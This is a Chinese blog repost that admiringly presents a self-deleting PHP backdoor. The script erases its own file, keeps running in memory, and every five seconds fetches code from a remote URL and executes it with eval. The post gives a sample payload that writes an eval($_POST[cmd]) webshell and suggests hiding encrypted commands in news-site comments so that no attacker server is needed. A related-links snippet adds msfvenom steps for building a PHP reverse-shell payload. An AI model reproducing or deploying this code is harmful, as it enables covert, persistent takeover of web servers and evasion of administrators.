捡了一个非常淫荡的PHP后门,给跪了

最新推荐文章于 2022-10-03 15:58:18 发布
最新推荐文章于 2022-10-03 15:58:18 发布
阅读量2.8k 收藏 12
点赞数
文章标签: php 爬虫
原文链接:http://www.cnblogs.com/h4ck0ne/p/5154562.html
版权

<?php

unlink($_SERVER['SCRIPT_FILENAME']);

ignore_user_abort(true);

set_time_limit(0);

$remote_file = 'http://xxx/xxx.txt';

while($code = file_get_contents($remote_file)){

@eval($code);

sleep(5);

};

?>

后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接

在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码 


例如txt里面写了一句这样的代码 file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");


这样就会在目录下又生成一个木马


如果对方写了是执行命令 。。。

这段代码纯粹变成了一个等待命令的木马。。


而且管理员检查木马文件的时候  都找不到。。。


因为文件已经删除了



木马却注入在php-fpm内


sleep(5);  五秒就去远程读取一下指令。。。

........

打算将代码修改一下,加一些正则,去163某一篇新闻的评论里读取预先设定的恶意代码。。。hehe。。。


黑客连服务器都省了。。。



黑客只需要去网易新闻评论窗口内写入自己的代码就行


怕别人看懂?


直接加密


采用对称加密算法。。没有秘钥 谁也看不懂啥意思


秘钥在这段后门里面写着


所以非常安全



活生生就是一个远控木马啊!!

这么好的思路,给作者一个大赞

转载于:https://www.cnblogs.com/h4ck0ne/p/5154562.html

weixin_30606461
关注
  • 0
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个不易被发现的PHP后门代码解析
10-25
主要介绍了一个不易被发现的PHP后门代码解析,对于网络安全来说非常重要,需要的朋友可以参考下
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
淫荡 (going down)
cn_2284456的博客
01-22 1397
发信人: trimedia (神龙教主), 信区: Joke 标 题: 转贴笑话一篇 发信站: BBS 水木清华站 (Sat Jan 11 22:54:42 2003), 转信 昨天遇上一件事情...
淫荡淫荡了点但我喜欢
热门推荐
qysword的专栏
08-23 1万+
h happy
纯手工打造HTTP请求,淫领HTTP协议!~
IntelligenceXenogeneicRobot
05-26 496
public static void main(String[] args) throws Exception{ // 我要模拟的URL //http://domain.oray.com/domain/check.php?domain=ixr.name&amp;free=0 String host = "domain.oray.com"; // 解析域名IP Str...
淫荡气息溢满魔都……
cengjingaiwo的专栏
07-30 3353
【上海2期吴传传:细说在兄弟连搞上PHP的那些事儿  】沫哥说要上一节PS课,教我们怎么脱去苍老师的衣服。管哥端着酒杯,正儿八经那样儿,我们以为他要好好说上几句,结果憋了小半天,来一句“好好学 啊”……在良哥的带领下,我们要搞个情人叫Linux,良哥说她很好搞,我们就信了。http://bbs.lampbrother.net/read-htm-tid-155663.html
pw的一个后门的方法分析
10-30
pw的一个后门的方法分析
3个php后门WebShell木马扫描神器
10-09
3个php后门WebShell木马扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,扫描自己网站服务器里面有没有后门,虚拟主机也可以用,密码打开文件修改,放入根目录,输入网址运行即可。
在线扫描php后门_webshell后门扫描-PHP
weixin_35740545的博客
03-09 1149
/**********************php扫描后门**********************/error_reporting(E_ERROR);ini_set(’max_execution_time’,20000);ini_set(’memory_limit’,’512M’);header("content-Type: text/html; charset=gb2312");$matc...
php在线查杀扫描webshell后门 对接WEBDIR+ Api
10-04
使用PHP对接百度 WebDir在线查杀接口 作者来源:https://mubaisu.com/webdir.html 并处理判断返回结果,使在线查杀文件不在是梦想~ 无需任何扩展和依赖限制 只要你服务器可以跑php 缺点:每次查杀都需要上传文件到WebDir 并等待返回结果 速度比较慢 需要耐心等待 优点:Api 免费 并且不限制上传文件数量。 WEBDIR+采用先进的动态监测技术,结合多种引擎零规则查杀,低误报、高查杀率。 Html Gui界面使用bootstrap 自适应
2019年php后门扫描文件
06-22
php后门扫描文件,下载该文件放到网站根目录,直接访问即可扫描
phpscan,php后门扫描神器
08-12
phpscan,php后门扫描神器,通过这个可以快速的扫描别人给予的代码里面是否包含后门代码,里面附详细的使用说明
最新免杀PHP大马 密码admin
06-05
最新免杀PHP大马 密码admin
PHP-Nulled-Scanner:扫描PHP脚本中的后门和隐藏代码
05-28
PHP空脚本扫描程序v2.2 该脚本试图检测从可疑来源下载PHP脚本中的后门和隐藏代码。 检查在不安全的脚本中发现的一些常见和不常见的字符串,这些字符串可能会导致广告,后门等。它使用递归grep搜索来输出可疑的文件名和行。 该脚本不是万无一失的,所有输出都应该由至少具有其系统中级知识的人员检查。 如果看起来不对劲,请将可疑文件备份到脱机存储设备,然后从Web服务器中删除原始文件。 很多时候,可以将这些幕后文件进行反向工程,以提供对该漏洞的独特见解。
php做扫描功能,phpscanphp后门扫描神器
weixin_34307867的博客
03-21 1026
扫描备份工具 源码 ,python 实现, 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现 扫描备份工具 源码 ,python 实现能针对PHP大马,PHP小马,PHP一句话,建网站PHP执行命令,UDF提权,SQL语句,COM组件调用,上传,怎样建网站越权,等后门进行扫描。 特点: 1.误报率极低。 2.兼容各种下,w...
php后门拿下当前目录
aici0819的博客
03-26 369
Weevely是一个模拟类似telnet的连接的隐形PHP网页shell。它是Web应用程序后期开发的必备工具,可以作为隐形后门程序,也可以作为一个web外壳来管理合法的Web帐户,甚至可以免费托管。 weevely是一款针对PHP的webshell的自由软件,可用于模拟一个类似于telnet的连接shell,weevely通常用于web程序的漏洞利用,隐藏后门或者使用类似tel...
渗透学习之PHP--后门
qq_62886656的博客
10-03 1856
渗透学习之php
一个比较淫荡的程序源码(VC)
日志
04-11 8339
一个比较淫荡的程序源码(VC) 一个比较淫荡的程序,编译好之后,运行,你就会.................. (VC) 复制内容到剪贴板 代码: /* code by W.Z.T */ /* Just For Fun */ #include #include #define SLEEP_TIME1 10 #define SLEEP
如何使用 msfvenom创造一个php后门
最新发布
04-07
以下是使用msfvenom创建php后门的步骤: 1. 打开终端并输入以下命令: ``` msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port Number> -f raw > backdoor.php ``` 2. 替换`<Your IP Address>`和`<Your Port Number>`为你的IP地址和端口号。 3. 运行命令后,将创建一个名为`backdoor.php`的文件,其中包含Meterpreter反向TCP Shell的payload。 4. 上传`backdoor.php`到目标服务器。 5. 打开Meterpreter会话,输入以下命令: ``` php backdoor.php ``` 6. 这将启动反向Shell并连接到你的机器上。现在你可以在目标服务器上执行命令以控制它。 请注意,这种方法仅适用于具有PHP解释器的目标服务器。如果目标服务器上没有PHP,则无法使用此方法创建后门

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值